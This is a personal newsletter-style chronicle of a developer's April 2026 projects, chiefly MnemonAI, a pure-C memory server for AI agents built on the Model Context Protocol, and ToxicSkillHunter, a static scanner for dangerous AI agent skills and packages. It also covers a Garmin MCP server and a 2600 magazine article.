Est. June 2025 Dispatches from the Frontier of Code & Security Price: One Good Commit

Rögnvaldr Chronicle

“Pushing the boundaries of what’s possible in technology while frustrating adversaries”
Vol. II · No. 4 Saturday, April 25, 2026 Ron Dilley · Correspondent

MnemonAI: 12,500 Lines of C Give
AI Agents a Permanent Memory

A bi-temporal knowledge graph with hybrid search ships as a full MCP server—local embeddings, ACID guarantees, and sub-25ms queries at one million memories

AI Infrastructure

MnemonAI: A Memory MCP Server Written in Pure C

12,500 lines of C, 343 tests, bi-temporal knowledge graph, and hybrid search—because AI agents deserve memories that outlast a session.

The problem with most AI agent architectures is amnesia. Every session starts from zero. Every context window is a blank slate. MnemonAI, which landed in April across 16 commits from initial concept to production-ready MCP server, addresses this directly: a local-only memory system that gives LLM agents persistent, searchable, temporally-aware memory through the Model Context Protocol.

At its core sits a bi-temporal knowledge graph—tracking both domain time (when something happened) and transaction time (when it was recorded)—combined with three search backends operating in concert: LMDB for primary key-value storage with ACID guarantees, SQLite FTS5 for BM25 keyword search, and usearch for HNSW vector similarity. Queries fuse results through Reciprocal Rank Fusion, and the system serves it all through 35 MCP tools covering memory CRUD, search, temporal queries, bulk import, and maintenance operations.

The engineering is uncompromising. Embeddings are generated locally via llama.cpp with nomic-embed-text-v1.5—no external API calls, no data leaving the machine. Hardware detection auto-selects AMD ROCm, NVIDIA CUDA, Intel GPU, AMD XDNA NPU, or SIMD paths depending on what the host offers. The result is hybrid search at one million memories with p50 latency of 18ms and p95 of 22ms on a single client, scaling to p99 of 104ms under ten concurrent clients.

Security features include secret detection, prompt injection scanning, rate limiting, and full audit logging. Crash safety comes from LMDB’s memory-mapped I/O with ACID transactions and rebuildable indexes. The server supports both local stdio transport and network HTTP with TLS and Bearer auth, installs to ~/.local/ with no root required, and ships with a systemd user service for auto-start.

“AI agents without memory are just expensive autocomplete. MnemonAI fixes that at the protocol layer.”

— Project README

Architecture

Inside the Hybrid Search Engine

Three search backends, one fusion algorithm, and a storage budget of ~7.5KB per memory

The choice of LMDB as the primary store is deliberate. Memory-mapped I/O means reads never copy data—the operating system’s page cache is the read cache. Writes are transactional with copy-on-write semantics, so a crash mid-write leaves the database intact. This is the same engine that powers OpenLDAP and Lightning Network nodes, chosen here for the same reason: it never corrupts data.

SQLite FTS5 handles keyword search with BM25 scoring, supporting prefix queries, phrase matching, and boolean operators. The vector index uses usearch’s HNSW algorithm for approximate nearest-neighbor search over locally-generated embeddings. At query time, all three backends run in parallel, and Reciprocal Rank Fusion merges their results into a unified relevance ranking.

The memory footprint is predictable: approximately 7.5KB per memory in RAM, meaning one million memories require around 8GB. The architecture is designed for machines that are already running LLM inference—if you have enough RAM for a 7B model, you have enough for a substantial memory store alongside it.


Benchmarks

LongMemEval and Performance Testing

Formal benchmark suite validates retrieval quality alongside raw throughput

April saw the addition of LongMemEval benchmarking to the test suite, providing a standardized measure of long-term memory retrieval quality across various query patterns. Combined with the existing 196 C unit tests and 105 MCP integration tests, the project now has 343 tests covering everything from LMDB transaction safety to end-to-end MCP protocol compliance.

Performance benchmarks tell the throughput story: at 100K memories, hybrid search completes in under 10ms p50. At one million, the p50 climbs to 18ms—still well within the latency budget of any conversational agent. Write throughput sustains thousands of memories per second, bounded primarily by embedding generation speed.

Development

From Initial Commit to Production in Two Weeks

16 commits trace the arc from empty repo to documented, benchmarked, vulnerability-patched MCP server

The commit history tells a story of focused intensity. April 4th saw the initial commit followed immediately by a complete initial implementation with all features written and tested—the kind of opening salvo that suggests extensive design work happened before fingers hit the keyboard.

April 5th brought a flurry of seven commits: fleshing out functionality, implementing features that had been stubbed, adding local user installation instructions, fixing vulnerabilities, addressing a ROCm bug, fixing a default config location issue, and adding the MCP integration reference documentation. This was the hardening phase—taking a working prototype and making it production-worthy.

April 6th through 8th focused on documentation, how-to guides, and the addition of formal LongMemEval benchmarking. The final commits on April 16th and 18th addressed memory performance and updated documentation—the quiet refinements that distinguish a shipped project from a prototype.


Ecosystem

Building the Local AI Stack

MnemonAI joins ProfessorAI and Podcastorum in a growing suite of local-first AI infrastructure

With MnemonAI providing persistent memory and ProfessorAI (shipped in March) serving local LLM inference via an OpenAI-compatible API, a pattern emerges: Ron is assembling a complete local AI stack where no data leaves the machine. ProfessorAI handles inference on AMD ROCm hardware, MnemonAI handles persistent memory through the MCP protocol, and Podcastorum demonstrates the kind of application these building blocks enable—local transcription and multi-model analysis of podcast audio without ever phoning home.

The common thread is C11 for the infrastructure layer (ProfessorAI, MnemonAI) and Python for the application layer (Podcastorum, llm_compare). Each piece wraps complex dependencies—llama.cpp, Whisper, LMDB—behind clean Unix interfaces: daemons, configuration files, systemd services, and standardized APIs. It’s the kind of stack that a privacy-conscious developer builds when they want the capabilities of cloud AI without the cloud.


AI Security

ToxicSkillHunter: Scanning the AI Supply Chain

Two generations of a static scanner for AI agent skills, MCP packages, and tool manifests—440 tests and zero executed artifacts

If MnemonAI asks what AI agents should remember, ToxicSkillHunter asks what AI agents should never be allowed to do. Shipped across two iterations in April (v1 on Apr 18–19, v2 rewrite on Apr 21–25), the scanner performs static analysis on AI agent skills, MCP packages, tool manifests, IDE rules files, and agent memory files—finding dangerous behaviours, hidden privileges, exfiltration paths, and trust-boundary violations without executing a single line of harvested code.

The first generation established the architecture: adapter-based harvesting from LocalPath, Git, GitHub, npm, and PyPI sources; a typed intermediate representation with Tainted<T> phantom types; per-parser sub-process isolation with OS-level resource caps; eight deterministic detectors plus TruffleHog integration; taint-aware cross-artifact attack graphs; and cryptographically signed SARIF 2.1.0 output. The containment axiom: “context must never become control.”

The second generation rebuilt around a single-copy artifact store backed by SQLite, added local ML model auto-provisioning for semantic confirmation of findings, and integrated ClamAV and Microsoft Defender for third-party A/V validation. The normal analysis path collapsed to two commands—harvest then scan—with ML, semantic confirmation, and A/V running as default pipeline stages that can be individually disabled.

··· “Frustrating adversaries since the dial-up era” · GitHub: rondilley · 43 Repositories and Counting ···

Around the Workshop

Published in 2600: “Prairie Dogs and Packet Dreams”

A personal timeline of hacker ethics, ethos, learning, and the long argument about what it all is—Spring 2026, pages 56–57

The Spring 2026 edition of 2600: The Hacker Quarterly carries “Prairie Dogs and Packet Dreams — A Personal Timeline of Hacker Ethics, Ethos, Learning, and the Long Argument About What It All Is” on pages 56–57. The article grew out of the hacker_rag project—a retrieval-augmented generation system built to explore the history and philosophy of hacking culture—and distills decades of firsthand experience into a meditation on what the hacker ethos actually means when the people arguing about it have been living it since the dial-up era. Getting ink in 2600 remains one of those milestones that matters to the people who understand why it matters.

• • •

The Rögnvaldr Chronicle Gets a Proper Home

April also saw the launch of www.rognvaldr.me—a proper website for the Chronicle, replacing the collection of standalone HTML files with a newspaper-style site featuring edition navigation, a podcast editorial analysis section, and links to the broader constellation of projects. The site displays the current edition on the main page with one-click access to all past issues and the growing library of podcast analyses.

• • •

Podcast Editorial Analyses Expanding

The Podcastorum pipeline continued to produce editorial analyses throughout April, with the collection growing to cover multiple Darknet Diaries episodes alongside broader philosophical and historical topics. Each analysis goes through a multi-model synthesis pipeline—not summaries but genuine critical examinations of the arguments, blind spots, and practical takeaways from each episode. The analyses are now published on the Rögnvaldr website alongside the monthly chronicles.

• • •

MyHealth MCP: Garmin Data Meets the Protocol Layer

Shipped April 24th, MyHealth_MCP is a local, single-user MCP server that exposes Garmin Connect data to LLM clients over stdio. Four read-only tools—get_status, garmin_list_activities, garmin_get_activity, and garmin_get_sleep—let an AI agent query fitness and sleep data without credentials ever reaching the model. Session tokens are provisioned once via a separate command; the MCP itself never prompts for passwords. Strava integration is planned for a future iteration.

• • •

Hacker RAG Refreshed for Current Models

The retrieval-augmented generation system behind the 2600 article received a mid-April refresh (Apr 17), updating its embeddings and retrieval pipeline to work with current-generation models. The project—which ingests foundational hacker culture texts and enables citation-backed exploration of decades of hacker thought—continues to serve as both a research tool and a demonstration of applied RAG architecture.

• • •

Deployment Patterns: The Unix Way

A recurring theme across MnemonAI, ProfessorAI, and the broader project suite is a commitment to Unix deployment conventions: INI configuration files with CLI overrides, systemd service files for process management, syslog for logging, ~/.local/ for user-space installation, and standard signal handling for graceful shutdown. In an era of Docker containers and Kubernetes manifests, there’s something refreshingly direct about a make install that puts a binary in your path and a config in your home directory.

Technical Notes

MnemonAI: Deployment Modes

Two deployment configurations ship out of the box: local stdio mode where the MCP client launches mnemond as a child process on the same machine, and network HTTP mode where a central server accepts connections from multiple remote clients sharing a single knowledge base. TLS and Bearer auth secure the network path.

Hardware-Aware Inference

Both MnemonAI and ProfessorAI auto-detect available hardware acceleration at startup—AMD ROCm GPUs, NVIDIA CUDA, Intel integrated graphics, AMD XDNA NPUs, and x86 SIMD instruction sets. The correct compute path is selected automatically, with fallback to CPU. No manual configuration required for the common case.

Security by Default

MnemonAI’s security posture goes beyond authentication: secret detection scans incoming memories for API keys and credentials before storage, prompt injection scanning guards against adversarial inputs designed to manipulate the retrieval pipeline, and rate limiting prevents resource exhaustion. Audit logging records every operation for forensic review.

ToxicSkillHunter: The Containment Axiom

The scanner’s core principle—“context must never become control”—means untrusted input is analyzed but never executed. Per-parser sub-process isolation enforces OS-level resource caps. API keys live in restricted memory regions the analysis plane cannot name. Output is cryptographically signed SARIF 2.1.0, decontaminated through a dedicated egress stage. The v2 rewrite added a single-copy SQLite artifact store, local ML auto-provisioning, and integrated ClamAV/Defender A/V validation.

The Stack
Primary LanguageC11 (MnemonAI, ProfessorAI)
Application LayerPython (ToxicSkillHunter, MyHealth, Podcastorum)
StorageLMDB + SQLite FTS5 + usearch
Embeddingsllama.cpp (nomic-embed-text-v1.5)
ProtocolMCP (stdio + HTTP/TLS)
HardwareAMD ROCm, NVIDIA, Intel, XDNA NPU
Tests343 (MnemonAI alone)
AchievementsArctic Code Vault, Starstruck, 2600 Author